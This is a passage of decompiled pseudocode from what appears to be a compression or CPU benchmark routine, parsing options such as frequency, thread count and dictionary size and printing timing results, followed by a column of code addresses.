																		 *( *_t1635)( *0x42aaa8);
																		L003CDB40(_t1635,  *(_t2139 + 0x17),  *(_t2139 - 0x5c),  *(_t2139 - 0x58),  *(_t2139 - 0xcc), _t2139 - 0x264);
																		( *_t1635)[4]();
																	}
																	L003CDD23(_t1635, "Tot:",  *(_t2139 - 0x2c4));
																	_t1768 = 0xa;
																	_t1312 = memcpy(_t2139 - 0x324, _t2139 - 0x28c, _t1768 << 2);
																	_t2142 =  &(_t2142[3]);
																	L003C9DE1(_t2139 - 0x324, _t1312);
																	_t2004 =  *(_t2139 + 0x17);
																	L003CDB40(_t1635,  *(_t2139 + 0x17),  *(_t2139 - 0x5c),  *(_t2139 - 0x58), 0, _t2139 - 0x324);
																	( *_t1635)[4]();
																	 *(_t2139 - 0x18) =  *(_t2139 - 0x18) + 1;
																	__eflags =  *(_t2139 - 0x18) - 3;
																} while ( *(_t2139 - 0x18) < 3);
																L00403D87(_t2139 - 0x11c);
																L003C9701(_t2139 - 0x30);
																_t2101 = 0;
																goto L483;
															}
															L191:
															 *(_t2139 - 0x14) = 1;
															goto L192;
														}
														 *(_t2139 - 0xf) = 1;
														E003B2711(_t2139 - 0xe4, 0x429390);
														goto L191;
													}
												} else {
													 *(_t2139 - 0x130) =  *(_t2139 - 0x130) & 0x00000000;
													 *((intOrPtr*)(_t2139 - 0x120)) = 0;
													L003C7B30(_t1123, _t2139 - 0x130);
													_t1127 = L003BDBB3(_t2139 - 0xf0, __eflags);
													__eflags =  *(_t2139 - 0xe);
													if(__eflags == 0) {
														__eflags = 0;
														_t386 = _t1127 + 0x10000; // 0x10000
														_t1861 = _t386;
														if(0 > 0) {
															L175:
															_push(_t2139 - 0x130);
															_push( *(_t2139 - 0x1c));
															_push(_t1635);
															_push(0x20);
															_push( *(_t2139 - 0x30));
															_push(_t1861);
															_push(_t2139 - 0xf0);
															_push(_t2139 - 0x1a0);
															_push( *(_t2139 - 0x7c));
															_push( *(_t2139 - 0x80));
															_t1127 = E003CCC1E(1,  *(_t2139 - 0x4c), __eflags);
															L176:
															_t2101 = _t1127;
															L479:
															_push( *((intOrPtr*)(_t2139 - 0x11c)));
															L480:
															E003B1E40(_t1127);
															goto L482;
														}
														if(0 < 0) {
															L180:
															_t2101 = 0x80070057;
															goto L479;
														}
														__eflags = _t1861 - _t1127;
														if(__eflags >= 0) {
															goto L175;
														}
														goto L180;
													}
													_t1861 =  *(_t2139 - 0x2c);
													goto L175;
												}
											}
											_t1454 = L003BDC06(_t2139 - 0xf0, __eflags, _t2139 - 0x68);
											__eflags = _t1454;
											if(__eflags != 0) {
												goto L169;
											}
											 *(_t2139 + 0xb) =  *(_t2139 + 0xb) & _t1454;
											goto L170;
										}
										__eflags = _t1635;
										if(_t1635 != 0) {
											( *_t1635)[4]();
											L135:
											_t1873 =  *(_t2139 - 0x4c);
											_t1469 =  *(_t2139 - 0x34) >> 1;
											__eflags = _t1873 - _t1469;
											 *(_t2139 + 8) = _t1469;
											if(_t1873 < _t1469) {
												 *(_t2139 + 8) = _t1873;
											}
											_t1470 = 1;
											__eflags =  *(_t2139 + 8) - _t1470;
											if( *(_t2139 + 8) < _t1470) {
												 *(_t2139 + 8) = _t1470;
											}
											__eflags = _t1635;
											if(_t1635 != 0) {
												L003B18FB(_t2139 - 0x3a4,  *(_t2139 + 8), 0);
												 *( *_t1635)(_t2139 - 0x3a4);
												 *( *_t1635)("T CPU Freq (MHz):");
											}
											 *(_t2139 - 0x88) = 0;
											__eflags =  *(_t2139 - 0x78) |  *(_t2139 - 0x74);
											_t2073 = 0x400;
											if(( *(_t2139 - 0x78) |  *(_t2139 - 0x74)) != 0) {
												while(1) {
													_t1489 = E0041F4B0(_t2073,  *(_t2139 - 0x88), 0xf4240, 0);
													__eflags =  *(_t2139 - 0x74) - _t1973;
													if(__eflags > 0) {
														goto L148;
													}
													if(__eflags < 0) {
														L145:
														_t1973 =  *(_t2139 - 0x88);
														_t1883 = 1;
														_t1491 = E0041F470(_t2073, _t1883, _t1973);
														__eflags = _t1973;
														_t2073 = _t1491;
														 *(_t2139 - 0x88) = _t1973;
														if(__eflags > 0) {
															continue;
														}
														if(__eflags < 0) {
															while(1) {
																L148:
																__eflags = _t1635;
																if(_t1635 == 0) {
																	goto L150;
																}
																_t1476 = ( *_t1635)[8]();
																__eflags = _t1476;
																if(_t1476 != 0) {
																	L159:
																	_t2101 = _t1476;
																	goto L482;
																}
																L150:
																 *(_t2139 - 0x178) = E0041F4B0(_t2073,  *(_t2139 - 0x88), 0xf4240, 0);
																 *(_t2139 - 0x164) =  *(_t2139 - 0x164) & 0x00000000;
																 *(_t2139 - 0x170) =  *(_t2139 + 8);
																_push(_t2139 - 0x1a0);
																_push(0);
																 *(_t2139 - 0x174) = _t1973;
																 *(_t2139 - 0x16c) = 1;
																 *(_t2139 - 0x168) = 1;
																_t1476 = E003CA39F(_t2139 - 0x178, _t2149);
																__eflags = _t1476;
																if(_t1476 != 0) {
																	goto L159;
																}
																__eflags =  *(_t2139 + 0x14) - _t1476;
																if( *(_t2139 + 0x14) == _t1476) {
																	L153:
																	__eflags = _t1635;
																	if(_t1635 != 0) {
																		_t2059 = 3;
																		E003CA27C(_t1635, _t2059,  *((intOrPtr*)(_t2139 - 0x158)),  *((intOrPtr*)(_t2139 - 0x154)));
																		 *( *_t1635)("%");
																		_t1484 = E0041F380( *(_t2139 - 0x160),  *(_t2139 - 0x15c), 0xf4240, 0);
																		__eflags = 0;
																		E003CA0A8(_t1635, 0, 0, _t1484, _t2059);
																		 *( *_t1635)("  ");
																	}
																	__eflags =  *(_t2139 - 0x88);
																	if(__eflags > 0) {
																		L160:
																		__eflags =  *(_t2139 + 0x14);
																		if( *(_t2139 + 0x14) == 0) {
																			goto L162;
																		}
																		_t1476 =  *((intOrPtr*)( *( *(_t2139 + 0x14)) + 4))( *(_t2139 + 8));
																		__eflags = _t1476;
																		if(_t1476 != 0) {
																			goto L159;
																		}
																		goto L162;
																	} else {
																		if(__eflags < 0) {
																			L158:
																			_t1973 =  *(_t2139 - 0x88);
																			_t1876 = 1;
																			_t2073 = E0041F4F0(_t2073, _t1876, _t1973);
																			 *(_t2139 - 0x88) = _t1973;
																			continue;
																		}
																		__eflags = _t2073 - 0x800;
																		if(_t2073 >= 0x800) {
																			goto L160;
																		}
																		goto L158;
																	}
																}
																_t1476 =  *((intOrPtr*)( *( *(_t2139 + 0x14))))( *(_t2139 + 8),  *(_t2139 - 0x160),  *(_t2139 - 0x15c),  *((intOrPtr*)(_t2139 - 0x158)),  *((intOrPtr*)(_t2139 - 0x154)));
																__eflags = _t1476;
																if(_t1476 != 0) {
																	goto L159;
																}
																goto L153;
															}
														}
														__eflags = _t2073 - 1;
														if(_t2073 > 1) {
															continue;
														}
														goto L148;
													}
													__eflags =  *(_t2139 - 0x78) - _t1489;
													if( *(_t2139 - 0x78) >= _t1489) {
														goto L148;
													}
													goto L145;
												}
											}
											goto L148;
										}
										__eflags =  *(_t2139 + 0x14);
										if( *(_t2139 + 0x14) == 0) {
											goto L164;
										}
										goto L135;
									}
									_t2073 = 0;
									__eflags = 0;
									L87:
									 *(_t2139 - 0x9c) = 0x40;
									__eflags =  *(_t2139 - 0x78) |  *(_t2139 - 0x74);
									 *(_t2139 - 0x98) = _t2073;
									if(( *(_t2139 - 0x78) |  *(_t2139 - 0x74)) == 0) {
										L94:
										 *(_t2139 - 0x6c) = _t2073;
										while(1) {
											__eflags = _t1635 - _t2073;
											if(_t1635 == _t2073) {
												goto L97;
											}
											_t1640 = _t1635;
											_t1476 = ( *_t1635)[8]();
											__eflags = _t1476 - _t2073;
											if(_t1476 != _t2073) {
												goto L159;
											}
											L97:
											 *(_t2139 - 0x5c) = L003C783A(_t1640);
											 *(_t2139 - 0x58) = _t1973;
											 *(_t2139 - 0xb8) = E0041F4B0( *(_t2139 - 0x9c),  *(_t2139 - 0x98), 0xf4240, _t2073);
											 *(_t2139 - 0xb4) = _t1973;
											_push( *0x43a464);
											_t1888 = 7;
											_t1501 = E0041F470(_t1500, _t1888, _t1973);
											_t1640 =  *(_t2139 - 0x5c);
											_t1973 = _t1501;
											_t1502 = E003CA6D7( *(_t2139 - 0x5c), _t1973);
											__eflags = _t1502 - 0xf1541213;
											if(_t1502 == 0xf1541213) {
												__eflags = _t1635 - _t2073;
												if(_t1635 != _t2073) {
													_t1640 = _t1635;
													 *( *_t1635)(0x429b34);
												}
											}
											_t1503 = L003C783A(_t1640);
											_t2098 = _t1973;
											_t2132 = _t1503 -  *(_t2139 - 0x5c);
											asm("sbb edi, [ebp-0x58]");
											 *(_t2139 - 0x5c) = _t2132;
											__eflags = _t2132 | _t2098;
											 *(_t2139 - 0x58) = _t2098;
											if((_t2132 | _t2098) == 0) {
												_t236 = _t2139 - 0x58;
												 *_t236 =  *(_t2139 - 0x58) & 0x00000000;
												__eflags =  *_t236;
												 *(_t2139 - 0x5c) = 1;
											}
											__eflags =  *(_t2139 - 0x58) - 0x20000000;
											if(__eflags < 0) {
												L106:
												 *(_t2139 - 0x54) = L003C785F(_t1640);
												 *(_t2139 - 0x50) = _t1973;
												 *(_t2139 - 0x8c) = L003C7AFF(_t1640, _t2149,  *(_t2139 - 0xb8),  *(_t2139 - 0xb4), _t1506, _t1973,  *(_t2139 - 0x5c),  *(_t2139 - 0x58));
												 *(_t2139 - 0x88) = _t1973;
												_t1509 = E0041F380(E0041F4B0( *(_t2139 - 0x54),  *(_t2139 - 0x50),  *(_t2139 - 0x9c),  *(_t2139 - 0x98)), _t1973,  *(_t2139 - 0x5c),  *(_t2139 - 0x58));
												__eflags = _t1635;
												 *((intOrPtr*)(_t2139 - 0x104)) = _t1509;
												 *(_t2139 - 0x100) = _t1973;
												if(_t1635 != 0) {
													__eflags = _t2132 | _t2098;
													if(__eflags != 0) {
														_t1640 = _t1635;
														_t1973 = 5;
														E003CA0A8(_t1635, _t1973, __eflags,  *((intOrPtr*)(_t2139 - 0x104)),  *(_t2139 - 0x100));
													} else {
														_t1640 = _t1635;
														 *( *_t1635)(" -");
													}
												}
												_t2133 =  *(_t2139 + 0x14);
												_t2073 = 0;
												__eflags = _t2133;
												if(_t2133 == 0) {
													L112:
													__eflags =  *(_t2139 - 0x6c) - 1;
													if( *(_t2139 - 0x6c) < 1) {
														L127:
														 *(_t2139 - 0x6c) =  *(_t2139 - 0x6c) + 1;
														_t2073 = 0;
														continue;
													}
													__eflags =  *(_t2139 - 0x98) - _t2073;
													if( *(_t2139 - 0x98) > _t2073) {
														L115:
														 *(_t2139 + 0xb) = 1;
														L117:
														_t1511 = E0041F4B0( *(_t2139 - 0x54),  *(_t2139 - 0x50), 0x10, _t2073);
														__eflags =  *(_t2139 - 0x58) - _t1973;
														if(__eflags < 0) {
															L123:
															__eflags =  *(_t2139 - 0xd);
															if( *(_t2139 - 0xd) != 0) {
																_t1516 = E0041F4B0( *((intOrPtr*)(_t2139 - 0x104)),  *(_t2139 - 0x100), 0xf4240, _t2073);
																_t1973 = 0;
																__eflags = 0;
																E003CCB58(0, _t1516, 0, _t2139 - 0x80);
															}
															__eflags =  *(_t2139 + 0xb);
															if( *(_t2139 + 0xb) != 0) {
																__eflags = _t2133 - _t2073;
																if(_t2133 == _t2073) {
																	goto L130;
																}
																_t1476 =  *((intOrPtr*)( *_t2133 + 4))(1);
																__eflags = _t1476 - _t2073;
																if(_t1476 != _t2073) {
																	goto L159;
																}
																goto L130;
															} else {
																_t1973 =  *(_t2139 - 0x98);
																_t1640 = 1;
																 *(_t2139 - 0x9c) = E0041F4F0( *(_t2139 - 0x9c), _t1640, _t1973);
																 *(_t2139 - 0x98) = _t1973;
																goto L127;
															}
														}
														if(__eflags > 0) {
															L120:
															 *( *_t1635)(" (Cmplx)");
															__eflags = _t2133 - _t2073;
															if(_t2133 == _t2073) {
																 *(_t2139 - 0xd) = 1;
															}
															 *(_t2139 + 0xb) = 1;
															goto L123;
														}
														__eflags =  *(_t2139 - 0x5c) - _t1511;
														if( *(_t2139 - 0x5c) < _t1511) {
															goto L123;
														}
														goto L120;
													}
													__eflags =  *(_t2139 - 0x9c) - 0x800;
													if( *(_t2139 - 0x9c) < 0x800) {
														_t269 = _t2139 + 0xb;
														 *_t269 =  *(_t2139 + 0xb) & 0x00000000;
														__eflags =  *_t269;
														goto L117;
													}
													goto L115;
												} else {
													_t1640 = _t2133;
													_t1476 =  *((intOrPtr*)( *_t2133))(1,  *(_t2139 - 0x8c),  *(_t2139 - 0x88), 0x10000, 0);
													__eflags = _t1476;
													if(_t1476 != 0) {
														goto L159;
													}
													goto L112;
												}
											} else {
												if(__eflags > 0) {
													L105:
													_t241 = _t2139 - 0x58;
													 *_t241 =  *(_t2139 - 0x58) & 0x00000000;
													__eflags =  *_t241;
													 *(_t2139 - 0x5c) = 1;
													goto L106;
												}
												__eflags =  *(_t2139 - 0x5c);
												if( *(_t2139 - 0x5c) <= 0) {
													goto L106;
												}
												goto L105;
											}
										}
									} else {
										goto L88;
									}
									while(1) {
										L88:
										_t1526 = E0041F4B0( *(_t2139 - 0x9c),  *(_t2139 - 0x98), 0xf4240, _t2073);
										__eflags =  *(_t2139 - 0x74) - _t1973;
										if(__eflags > 0) {
											goto L94;
										}
										if(__eflags < 0) {
											L91:
											_t1973 =  *(_t2139 - 0x98);
											_t1640 = 1;
											_t1528 = E0041F470( *(_t2139 - 0x9c), _t1640, _t1973);
											__eflags = _t1973 - _t2073;
											 *(_t2139 - 0x9c) = _t1528;
											 *(_t2139 - 0x98) = _t1973;
											if(__eflags > 0) {
												continue;
											}
											if(__eflags < 0) {
												goto L94;
											}
											__eflags = _t1528 - 1;
											if(_t1528 > 1) {
												continue;
											}
											goto L94;
										}
										__eflags =  *(_t2139 - 0x78) - _t1526;
										if( *(_t2139 - 0x78) >= _t1526) {
											goto L94;
										}
										goto L91;
									}
									goto L94;
								}
								E003B2690(_t2139 - 0x40);
								 *(_t2139 - 4) = 0xf;
								E003BA06D(_t2139 - 0x40, __eflags);
								 *( *_t1635)( *((intOrPtr*)(_t2139 - 0x40)));
								_t1534 = ( *_t1635)[4]();
								 *(_t2139 - 4) = 1;
								E003B1E40(_t1534,  *((intOrPtr*)(_t2139 - 0x40)));
								_t1640 = _t1635;
								 *_t2142 = "1T CPU Freq (MHz):";
								 *( *_t1635)();
								goto L87;
							} else {
								goto L14;
							}
							do {
								L14:
								_t2135 =  *((intOrPtr*)( *( *(_t2139 + 8)) +  *(_t2139 - 0x14) * 4));
								E003B2E5F(_t2139 - 0x28, __eflags, _t2135);
								E003B2285( *(_t2139 - 0x28));
								_t1973 = "file";
								_t1127 = E003B23AC( *(_t2139 - 0x28), _t1973);
								__eflags = _t1127;
								if(_t1127 == 0) {
									 *(_t2139 - 0xb0) = _t2073;
									 *(_t2139 - 0xae) = _t2073;
									 *(_t2139 - 0xa8) = _t2073;
									__eflags =  *((intOrPtr*)(_t2135 + 0x10)) - _t2073;
									 *(_t2139 - 4) = 6;
									if( *((intOrPtr*)(_t2135 + 0x10)) != _t2073) {
										_t103 = _t2135 + 0xc; // 0xd
										E003CE76A(_t103, _t2139 - 0xb0);
									}
									_t1542 = E003B23AC( *(_t2139 - 0x28), "time");
									__eflags = _t1542;
									if(_t1542 == 0) {
										_t1543 = E003B23AC( *(_t2139 - 0x28), "timems");
										__eflags = _t1543;
										if(_t1543 == 0) {
											_t1544 = E003B23AC( *(_t2139 - 0x28), "tic");
											__eflags = _t1544;
											if(_t1544 == 0) {
												_t1545 = E003B23AC( *(_t2139 - 0x28), "df");
												__eflags = _t1545;
												if(_t1545 == 0) {
													_t1546 = E003B23AC( *(_t2139 - 0x28), "ds");
													__eflags = _t1546;
													if(_t1546 != 0) {
														goto L41;
													}
													_t1553 = E003B23AC( *(_t2139 - 0x28), "mts");
													__eflags = _t1553;
													if(_t1553 == 0) {
														_t1554 = E003B23AC( *(_t2139 - 0x28), "af");
														__eflags = _t1554;
														if(_t1554 == 0) {
															_t1973 = "freq";
															_t1555 = E003B23AC( *(_t2139 - 0x28), _t1973);
															__eflags = _t1555;
															if(_t1555 == 0) {
																_t1556 = E003B2357(_t2139 - 0x28, "mt");
																__eflags = _t1556;
																if(_t1556 == 0) {
																	_push(_t2139 - 0xb0);
																	_push(_t2139 - 0x28);
																	_t1559 = L003BDE7C(_t2139 - 0xf0);
																	__eflags = _t1559 - _t2073;
																	if(_t1559 != _t2073) {
																		_t2101 = _t1559;
																		goto L81;
																	}
																	goto L44;
																}
																E003B2D8A(_t2139 - 0x40,  &(( *(_t2139 - 0x28))[4]));
																_t1973 = 0x429390;
																 *(_t2139 - 4) = 0xe;
																_t1563 = E003B23AC( *((intOrPtr*)(_t2139 - 0x40)), 0x429390);
																__eflags = _t1563;
																if(_t1563 != 0) {
																	L68:
																	_push( *((intOrPtr*)(_t2139 - 0x40)));
																	 *(_t2139 - 0x6d) = 1;
																	L69:
																	E003B1E40(_t1563);
																	goto L44;
																}
																__eflags =  *(_t2139 - 0x3c) - _t2073;
																if(__eflags != 0) {
																	L66:
																	 *(_t2139 - 0x6f) =  *(_t2139 - 0x6f) & 0x00000000;
																	 *(_t2139 - 0x4c) =  *(_t2139 - 0x34);
																	_push(_t2139 - 0x6f);
																	_push(_t2139 - 0x4c);
																	_t1973 = _t2139 - 0xb0;
																	_t2101 = E003BD027(_t2139 - 0x40, _t1973, __eflags);
																	_push( *((intOrPtr*)(_t2139 - 0x40)));
																	__eflags = _t2101 - _t2073;
																	if(_t2101 != _t2073) {
																		E003B1E40(_t1563);
																		goto L81;
																	}
																	goto L69;
																}
																__eflags =  *(_t2139 - 0xb0) - 8;
																if(__eflags != 0) {
																	goto L66;
																}
																_t1973 = 0x429390;
																__eflags = E003B23AC( *(_t2139 - 0xa8), 0x429390);
																if(__eflags != 0) {
																	goto L68;
																}
																goto L66;
															}
															 *(_t2139 - 0x18) = _t2073;
															_t1569 = E003B2D47(_t2139 - 0xa0);
															_t1973 = _t2139 - 0xb0;
															 *(_t2139 - 4) = 0xd;
															_t2101 = E003BCFDB(_t1569, _t1973, _t2139 - 0x18);
															 *(_t2139 - 4) = 6;
															E003B1E40(_t1570,  *((intOrPtr*)(_t2139 - 0xa0)));
															__eflags = _t2101 - _t2073;
															if(_t2101 != _t2073) {
																goto L81;
															}
															__eflags =  *(_t2139 - 0x18) - _t2073;
															if( *(_t2139 - 0x18) == _t2073) {
																goto L82;
															}
															_t1572 = E0041F4B0( *(_t2139 - 0x18), _t2073, 0xf4240, _t2073);
															__eflags = _t1635 - _t2073;
															 *(_t2139 - 0x78) = _t1572;
															 *(_t2139 - 0x74) = _t1973;
															if(__eflags != 0) {
																 *( *_t1635)("freq=");
																_t1973 = 0;
																E003CA0A8(_t1635, 0, __eflags,  *(_t2139 - 0x18), _t2073);
																( *_t1635)[4]();
															}
															goto L44;
														}
														_t1578 = E003B2D47(_t2139 - 0x60);
														_t1973 = _t2139 - 0xb0;
														 *(_t2139 - 4) = 0xc;
														_t2101 = E003BCFDB(_t1578, _t1973, _t2139 - 0x84);
														E003B1E40(_t1579,  *((intOrPtr*)(_t2139 - 0x60)));
														__eflags = _t2101 - _t2073;
														if(_t2101 != _t2073) {
															goto L81;
														} else {
															_t1581 =  *(_t2139 - 0x84);
															__eflags = _t1581 - _t2073;
															if(_t1581 > _t2073) {
																__eflags = _t1581 -  *(_t2139 - 0x34);
																if(_t1581 <  *(_t2139 - 0x34)) {
																	L003C7CA2(_t2139 - 0x1a0,  *(_t2139 - 0x34), 2);
																	 *(_t2139 - 0x1a0) =  *(_t2139 - 0x84);
																}
															}
															goto L44;
														}
													}
													_t1584 = E003B2D47(_t2139 - 0xfc);
													_t1973 = _t2139 - 0xb0;
													 *(_t2139 - 4) = 0xb;
													_t2101 = E003BCFDB(_t1584, _t1973, _t2139 - 0x148);
													E003B1E40(_t1585,  *((intOrPtr*)(_t2139 - 0xfc)));
													__eflags = _t2101 - _t2073;
													if(_t2101 != _t2073) {
														goto L81;
													} else {
														goto L44;
													}
												} else {
													 *(_t2139 - 0xf) = 1;
													L41:
													_t1547 = E003B2D47(_t2139 - 0x184);
													_t1973 = _t2139 - 0xb0;
													 *(_t2139 - 4) = 0xa;
													_t2101 = E003BCFDB(_t1547, _t1973, _t2139 - 0x94);
													E003B1E40(_t1548,  *((intOrPtr*)(_t2139 - 0x184)));
													__eflags = _t2101 - _t2073;
													if(_t2101 != _t2073) {
														L81:
														_t1127 = E003B92C9(_t2139 - 0xb0);
														L75:
														_push( *(_t2139 - 0x28));
														goto L480;
													}
													__eflags =  *(_t2139 - 0x94) - 0x20;
													if( *(_t2139 - 0x94) > 0x20) {
														L82:
														_t2101 = 0x80070057;
														goto L81;
													} else {
														 *(_t2139 - 0x6e) = 1;
														L44:
														_t1550 = E003B92C9(_t2139 - 0xb0);
														goto L45;
													}
												}
											}
											_t1587 = E003B2D47(_t2139 - 0x90);
											 *(_t2139 - 4) = 9;
											_t2101 = E003BCFDB(_t1587, _t2139 - 0xb0, _t2139 - 0x10c);
											E003B1E40(_t1588,  *((intOrPtr*)(_t2139 - 0x90)));
											__eflags = _t2101 - _t2073;
											if(_t2101 != _t2073) {
												goto L81;
											}
											_t1943 =  *(_t2139 - 0x10c);
											__eflags =  *(_t2139 - 0x10c) - 0x40;
											if( *(_t2139 - 0x10c) >= 0x40) {
												goto L82;
											} else {
												_t1973 = 0;
												_t1590 = 1;
												 *(_t2139 - 0x80) = E0041F4F0(_t1590, _t1943, 0);
												 *(_t2139 - 0x7c) = 0;
												goto L44;
											}
										}
										_t1592 = E003B2D47(_t2139 - 0x108);
										_t1973 = _t2139 - 0xb0;
										 *(_t2139 - 4) = 8;
										_t2101 = E003BCFDB(_t1592, _t1973, _t2139 - 0xc8);
										E003B1E40(_t1593,  *((intOrPtr*)(_t2139 - 0x108)));
										__eflags = _t2101 - _t2073;
										if(_t2101 != _t2073) {
											goto L81;
										} else {
											 *(_t2139 - 0xd) = 1;
											goto L44;
										}
									}
									_t1595 = E003B2D47(_t2139 - 0xbc);
									_t1973 = _t2139 - 0xb0;
									 *(_t2139 - 4) = 7;
									_t2101 = E003BCFDB(_t1595, _t1973, _t2139 - 0xc8);
									E003B1E40(_t1596,  *((intOrPtr*)(_t2139 - 0xbc)));
									__eflags = _t2101 - _t2073;
									if(_t2101 != _t2073) {
										goto L81;
									} else {
										 *(_t2139 - 0xd) = 1;
										 *(_t2139 - 0xc8) =  *(_t2139 - 0xc8) * 0x3e8;
										goto L44;
									}
								}
								__eflags =  *((intOrPtr*)(_t2135 + 0x10)) - _t2073;
								if( *((intOrPtr*)(_t2135 + 0x10)) == _t2073) {
									_t2101 = 0x80070057;
									goto L75;
								}
								 *(_t2139 - 0x12c) =  *(_t2139 - 0x12c) | 0xffffffff;
								 *(_t2139 - 0x128) =  *(_t2139 - 0x128) & 0x00000000;
								 *(_t2139 - 4) = 5;
								_t1601 = L003B7817( *((intOrPtr*)(_t2135 + 0xc)));
								__eflags = _t1601;
								if(_t1601 == 0) {
									L77:
									_t2101 = E003B7253();
									L74:
									_t1127 = E003B7322(_t2139 - 0x12c);
									goto L75;
								}
								_t1604 = E003B7342(_t2139 - 0x12c, _t2139 - 0x54);
								__eflags = _t1604;
								if(_t1604 == 0) {
									goto L77;
								} else {
									__eflags = _t1635 - _t2073;
									if(_t1635 != _t2073) {
										 *( *_t1635)("file size =");
										_t1973 = 0;
										__eflags = 0;
										E003CA0A8(_t1635, 0, 0,  *(_t2139 - 0x54),  *(_t2139 - 0x50));
										( *_t1635)[4]();
									}
									_t2137 =  *(_t2139 - 0x54);
									__eflags = _t2137 - _t2137;
									if(_t2137 != _t2137) {
										L73:
										_t2101 = 0x80070057;
										goto L74;
									}
									__eflags = 0 -  *(_t2139 - 0x50);
									if(0 !=  *(_t2139 - 0x50)) {
										goto L73;
									}
									E003C82E9(_t2139 - 0x30, _t2137);
									__eflags = _t2137 - _t2073;
									if(_t2137 == _t2073) {
										L24:
										 *(_t2139 - 0xe) = 1;
										_t1608 = L003B7874(_t2139 - 0x12c,  *(_t2139 - 0x30), _t2137, _t2139 - 0x110);
										__eflags = _t1608;
										if(_t1608 == 0) {
											goto L77;
										}
										__eflags =  *(_t2139 - 0x110) - _t2137;
										if( *(_t2139 - 0x110) != _t2137) {
											_t2101 = 0x80004005;
											goto L74;
										} else {
											_t1550 = E003B7322(_t2139 - 0x12c);
											goto L45;
										}
									}
									__eflags =  *(_t2139 - 0x30) - _t2073;
									if( *(_t2139 - 0x30) == _t2073) {
										_t2101 = 0x8007000e;
										goto L74;
									}
									goto L24;
								}
								L45:
								 *(_t2139 - 4) = 1;
								E003B1E40(_t1550,  *(_t2139 - 0x28));
								 *(_t2139 - 0x14) =  *(_t2139 - 0x14) + 1;
								_t1640 =  *(_t2139 - 0x14);
								__eflags =  *(_t2139 - 0x14) - 4[ *(_t2139 + 8)];
							} while (__eflags < 0);
							goto L83;
						}
						_t1614 =  *(_t2139 + 8);
						 *(_t2139 - 0x14) = _t2073;
						__eflags = 4[_t1614] - _t2073;
						if(4[_t1614] <= _t2073) {
							L11:
							_t1615 =  *(_t2139 + 8);
							__eflags = 4[_t1615] - _t2073;
							if(4[_t1615] != _t2073) {
								_t1640 = _t1635;
								( *_t1635)[4]();
							}
							goto L13;
						} else {
							goto L8;
						}
						do {
							L8:
							_t2138 =  *((intOrPtr*)( *( *(_t2139 + 8)) +  *(_t2139 - 0x14) * 4));
							 *( *_t1635)(" ");
							_t1622 = E003C0AB6();
							_t1973 =  *_t1635;
							 *(_t2139 - 4) = 2;
							_t1624 =  *_t1973( *_t1622);
							 *(_t2139 - 4) = 1;
							E003B1E40(_t1624,  *((intOrPtr*)(_t2139 - 0x40)));
							__eflags =  *((intOrPtr*)(_t2138 + 0x10)) - _t2073;
							if( *((intOrPtr*)(_t2138 + 0x10)) != _t2073) {
								 *( *_t1635)("=");
								_t1629 = E003C0AB6();
								_t1973 =  *_t1635;
								 *(_t2139 - 4) = 3;
								_t1631 =  *_t1973( *_t1629);
								 *(_t2139 - 4) = 1;
								E003B1E40(_t1631,  *(_t2139 - 0x28));
							}
							 *(_t2139 - 0x14) =  *(_t2139 - 0x14) + 1;
							_t1626 =  *(_t2139 + 8);
							_t1640 =  *(_t2139 - 0x14);
							__eflags =  *(_t2139 - 0x14) - 4[_t1626];
						} while ( *(_t2139 - 0x14) < 4[_t1626]);
						goto L11;
					}
					_t1633 = L003B97AF( *(_t2139 - 0x144));
					__eflags = _t1633;
					if(_t1633 == 0) {
						goto L5;
					} else {
						_t1110 = L003B97AF( *(_t2139 - 0x144));
						goto L6;
					}
				} else {
					_t1119 = 0x80004005;
					L484:
					 *[fs:0x0] =  *((intOrPtr*)(_t2139 - 0xc));
					return _t1119;
				}
			}
















































































































































































































                                                                                                    0x003ca8a6
                                                                                                    0x003ca8a6
                                                                                                    0x003ca8ab
                                                                                                    0x003ca8b0
                                                                                                    0x003ca8b9
                                                                                                    0x003ca8bc
                                                                                                    0x003ca8c5
                                                                                                    0x003ca8d3
                                                                                                    0x003ca8d5
                                                                                                    0x003ca8dc
                                                                                                    0x003ca8e6
                                                                                                    0x003ca8ec
                                                                                                    0x003ca8f2
                                                                                                    0x003ca8f8
                                                                                                    0x003ca8fd
                                                                                                    0x003ca8ff
                                                                                                    0x003ca91d
                                                                                                    0x003ca91d
                                                                                                    0x003ca922
                                                                                                    0x003ca928
                                                                                                    0x003ca92b
                                                                                                    0x003ca930
                                                                                                    0x003ca934
                                                                                                    0x003ca938
                                                                                                    0x003ca93c
                                                                                                    0x003ca945
                                                                                                    0x003ca94b
                                                                                                    0x003ca94e
                                                                                                    0x003ca958
                                                                                                    0x003ca962
                                                                                                    0x003ca965
                                                                                                    0x003ca968
                                                                                                    0x003ca96b
                                                                                                    0x003ca972
                                                                                                    0x003ca978
                                                                                                    0x003ca97e
                                                                                                    0x003ca984
                                                                                                    0x003ca98a
                                                                                                    0x003ca98f
                                                                                                    0x003ca992
                                                                                                    0x003ca995
                                                                                                    0x003ca998
                                                                                                    0x003ca99c
                                                                                                    0x003ca9a0
                                                                                                    0x003ca9a2
                                                                                                    0x003ca9a6
                                                                                                    0x003caa43
                                                                                                    0x003caa46
                                                                                                    0x003caa4c
                                                                                                    0x003caa4e
                                                                                                    0x003cafbf
                                                                                                    0x003cafbf
                                                                                                    0x003cafc1
                                                                                                    0x003cb002
                                                                                                    0x003cb005
                                                                                                    0x003cb2ab
                                                                                                    0x003cb2ab
                                                                                                    0x003cb2af
                                                                                                    0x003cb49c
                                                                                                    0x003cb49c
                                                                                                    0x003cb49e
                                                                                                    0x003cb4a4
                                                                                                    0x003cb4ab
                                                                                                    0x003cb4cf
                                                                                                    0x003cb4ec
                                                                                                    0x003cb4f0
                                                                                                    0x003cb4f2
                                                                                                    0x003cb4fc
                                                                                                    0x003cb506
                                                                                                    0x003cb506
                                                                                                    0x003cb509
                                                                                                    0x003cb50b
                                                                                                    0x003cb50c
                                                                                                    0x003cb50f
                                                                                                    0x003ccb29
                                                                                                    0x003ccb29
                                                                                                    0x003ccb2e
                                                                                                    0x003ccb31
                                                                                                    0x003ccb36
                                                                                                    0x003ccb36
                                                                                                    0x003ccb36
                                                                                                    0x003ccb36
                                                                                                    0x003ccb40
                                                                                                    0x003ccb45
                                                                                                    0x00000000
                                                                                                    0x003ccb45
                                                                                                    0x003cb515
                                                                                                    0x003cb51c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003cb52a
                                                                                                    0x003cb52f
                                                                                                    0x003cb533
                                                                                                    0x003cb536
                                                                                                    0x003cb539
                                                                                                    0x003cb553
                                                                                                    0x003cb553
                                                                                                    0x003cb557
                                                                                                    0x003cb562
                                                                                                    0x003cb575
